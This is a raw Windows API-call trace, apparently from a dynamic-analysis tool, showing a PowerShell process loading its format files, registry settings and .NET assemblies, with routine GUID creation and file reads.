	[0757.149] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xaddd8f37, Data2=0x582a, Data3=0x4306, Data4=([0]=0x96, [1]=0x8f, [2]=0xfc, [3]=0x8, [4]=0x88, [5]=0x23, [6]=0xbd, [7]=0xb1))) returned 0x0
	[0757.150] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xc9b946f0, Data2=0x5b03, Data3=0x41bc, Data4=([0]=0x89, [1]=0xf, [2]=0x54, [3]=0x71, [4]=0x62, [5]=0x8d, [6]=0x9, [7]=0x9c))) returned 0x0
	[0757.151] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xe4b16f13, Data2=0xd773, Data3=0x42f1, Data4=([0]=0x8c, [1]=0xd0, [2]=0x79, [3]=0xfc, [4]=0xd6, [5]=0xcb, [6]=0x13, [7]=0xde))) returned 0x0
	[0757.152] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x2293d48f, Data2=0x2af0, Data3=0x42c8, Data4=([0]=0x93, [1]=0x81, [2]=0x6f, [3]=0xf2, [4]=0xc0, [5]=0xbf, [6]=0x24, [7]=0xe7))) returned 0x0
	[0757.152] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xd50d7d63, Data2=0xd8de, Data3=0x4efc, Data4=([0]=0x92, [1]=0xc4, [2]=0x42, [3]=0xa5, [4]=0xd5, [5]=0xf6, [6]=0xfb, [7]=0x25))) returned 0x0
	[0757.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0757.153] SetErrorMode (uMode=0x1) returned 0x1
	[0757.153] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0757.153] GetFileType (hFile=0x314) returned 0x1
	[0757.153] SetErrorMode (uMode=0x1) returned 0x1
	[0757.153] GetFileType (hFile=0x314) returned 0x1
	[0757.153] ReadFile (in: hFile=0x314, lpBuffer=0x32eeb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32eeb38*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0757.154] ReadFile (in: hFile=0x314, lpBuffer=0x32eeb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32eeb38*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0757.155] ReadFile (in: hFile=0x314, lpBuffer=0x32eeb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32eeb38*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0757.155] ReadFile (in: hFile=0x314, lpBuffer=0x32eeb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32eeb38*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0757.155] ReadFile (in: hFile=0x314, lpBuffer=0x32eeb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32eeb38*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0757.155] ReadFile (in: hFile=0x314, lpBuffer=0x32eeb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32eeb38*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0757.155] ReadFile (in: hFile=0x314, lpBuffer=0x32eeb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32eeb38*, lpNumberOfBytesRead=0x14cd18*=0xaca, lpOverlapped=0x0) returned 1
	[0757.155] ReadFile (in: hFile=0x314, lpBuffer=0x32ee16a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32ee16a*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0757.156] ReadFile (in: hFile=0x314, lpBuffer=0x32eeb38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x32eeb38*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0757.156] CloseHandle (hObject=0x314) returned 1
	[0757.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0757.156] SetErrorMode (uMode=0x1) returned 0x1
	[0757.156] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14ccc0 | out: lpFileInformation=0x14ccc0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0757.156] SetErrorMode (uMode=0x1) returned 0x1
	[0757.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0757.156] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cda8 | out: phkResult=0x14cda8*=0x314) returned 0x0
	[0757.157] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cd2c, lpData=0x0, lpcbData=0x14cd28*=0x0 | out: lpType=0x14cd2c*=0x1, lpData=0x0, lpcbData=0x14cd28*=0x56) returned 0x0
	[0757.157] CoTaskMemAlloc (cb=0x5a) returned 0x1b73d150
	[0757.157] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ccfc, lpData=0x1b73d150, lpcbData=0x14ccf8*=0x56 | out: lpType=0x14ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ccf8*=0x56) returned 0x0
	[0757.157] CoTaskMemFree (pv=0x1b73d150) 
	[0757.157] RegCloseKey (hKey=0x314) returned 0x0
	[0757.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0757.157] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0757.164] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0758.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0758.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0758.427] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0758.428] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0758.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0758.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0758.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0758.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0758.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0758.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0758.434] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0758.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0758.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management\\2.0.0.0__b03f5f7f11d50a3a\\System.Management.dll", lpFilePart=0x0) returned 0x5e
	[0758.437] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.DirectoryServices\\2.0.0.0__b03f5f7f11d50a3a\\System.DirectoryServices.dll", lpFilePart=0x0) returned 0x6c
	[0758.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0758.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0758.438] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0758.439] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0759.698] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x25aca18, Data2=0xa89a, Data3=0x4737, Data4=([0]=0xa7, [1]=0xbf, [2]=0x31, [3]=0xf7, [4]=0x8f, [5]=0x1d, [6]=0x21, [7]=0xd))) returned 0x0
	[0759.698] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xbf15a5cf, Data2=0x7456, Data3=0x4af2, Data4=([0]=0xaf, [1]=0x9, [2]=0x12, [3]=0x51, [4]=0xa9, [5]=0x35, [6]=0x95, [7]=0xaa))) returned 0x0
	[0759.699] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x6876c06c, Data2=0x7184, Data3=0x48c4, Data4=([0]=0x82, [1]=0x71, [2]=0xe7, [3]=0x13, [4]=0x94, [5]=0x83, [6]=0xe2, [7]=0xb8))) returned 0x0
	[0759.699] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x78dda90a, Data2=0xbc65, Data3=0x4e96, Data4=([0]=0x8b, [1]=0xb0, [2]=0xd2, [3]=0x1c, [4]=0x99, [5]=0x78, [6]=0x93, [7]=0x17))) returned 0x0
	[0759.700] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xa53a350b, Data2=0xc944, Data3=0x4538, Data4=([0]=0xbc, [1]=0xb7, [2]=0xa1, [3]=0x83, [4]=0xb1, [5]=0x6e, [6]=0xb0, [7]=0x74))) returned 0x0
	[0759.700] VirtualQuery (in: lpAddress=0x14b2b0, lpBuffer=0x14c170, dwLength=0x30 | out: lpBuffer=0x14c170*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0759.700] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x3de3deb9, Data2=0x38a1, Data3=0x4293, Data4=([0]=0x97, [1]=0x15, [2]=0xff, [3]=0x2a, [4]=0x8, [5]=0x10, [6]=0xa, [7]=0xb8))) returned 0x0
	[0759.700] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0xdab1b6b0, Data2=0x8696, Data3=0x46f4, Data4=([0]=0x9e, [1]=0x23, [2]=0xad, [3]=0x45, [4]=0xc, [5]=0x4b, [6]=0xd6, [7]=0x9a))) returned 0x0
	[0759.700] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0759.701] GetFileType (hFile=0x314) returned 0x1
	[0759.701] SetErrorMode (uMode=0x1) returned 0x1
	[0759.701] GetFileType (hFile=0x314) returned 0x1
	[0759.701] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.702] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.702] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.702] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.702] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.702] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.703] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.703] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.704] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.705] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.705] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.705] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.706] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.706] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.706] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.707] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.709] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x1000, lpOverlapped=0x0) returned 1
	[0759.710] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0xbce, lpOverlapped=0x0) returned 1
	[0759.710] ReadFile (in: hFile=0x314, lpBuffer=0x33a0866, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a0866*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0759.710] ReadFile (in: hFile=0x314, lpBuffer=0x33a1130, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cd18, lpOverlapped=0x0 | out: lpBuffer=0x33a1130*, lpNumberOfBytesRead=0x14cd18*=0x0, lpOverlapped=0x0) returned 1
	[0759.710] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cda8 | out: phkResult=0x14cda8*=0x314) returned 0x0
	[0759.711] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cd2c, lpData=0x0, lpcbData=0x14cd28*=0x0 | out: lpType=0x14cd2c*=0x1, lpData=0x0, lpcbData=0x14cd28*=0x56) returned 0x0
	[0759.711] CoTaskMemAlloc (cb=0x5a) returned 0x1b73d620
	[0759.711] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14ccfc, lpData=0x1b73d620, lpcbData=0x14ccf8*=0x56 | out: lpType=0x14ccfc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14ccf8*=0x56) returned 0x0
	[0759.711] CoTaskMemFree (pv=0x1b73d620) 
	[0759.711] RegCloseKey (hKey=0x314) returned 0x0
	[0759.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0759.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0759.712] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x3c03d22c, Data2=0xd8cb, Data3=0x4a00, Data4=([0]=0x91, [1]=0x6b, [2]=0xfa, [3]=0x74, [4]=0x5a, [5]=0xbc, [6]=0xa3, [7]=0x69))) returned 0x0
	[0759.713] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x262ca607, Data2=0xc2ef, Data3=0x4c82, Data4=([0]=0xb2, [1]=0xba, [2]=0x4c, [3]=0xf0, [4]=0x2e, [5]=0x8f, [6]=0x30, [7]=0x38))) returned 0x0
	[0759.713] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x72f98ad8, Data2=0x83f3, Data3=0x4a02, Data4=([0]=0xad, [1]=0x1, [2]=0x6a, [3]=0x4f, [4]=0xde, [5]=0xcf, [6]=0xfe, [7]=0xda))) returned 0x0
	[0759.713] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x281a240, Data2=0x58fd, Data3=0x4819, Data4=([0]=0x82, [1]=0x1c, [2]=0xda, [3]=0xe8, [4]=0xd9, [5]=0xee, [6]=0xb4, [7]=0xe6))) returned 0x0
	[0759.713] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x4900c9a5, Data2=0x28b6, Data3=0x428c, Data4=([0]=0x9b, [1]=0x9f, [2]=0x1e, [3]=0xfd, [4]=0xd6, [5]=0x99, [6]=0xeb, [7]=0xbb))) returned 0x0
	[0759.713] CoCreateGuid (in: pguid=0x14cfd0 | out: pguid=0x14cfd0*(Data1=0x9d78653a, Data2=0x676f, Data3=0x4d80, Data4=([0]=0xb0, [1]=0x96, [2]=0x73, [3]=0xa1, [4]=0x78, [5]=0x18, [6]=0xf8, [7]=0xdf))) returned 0x0
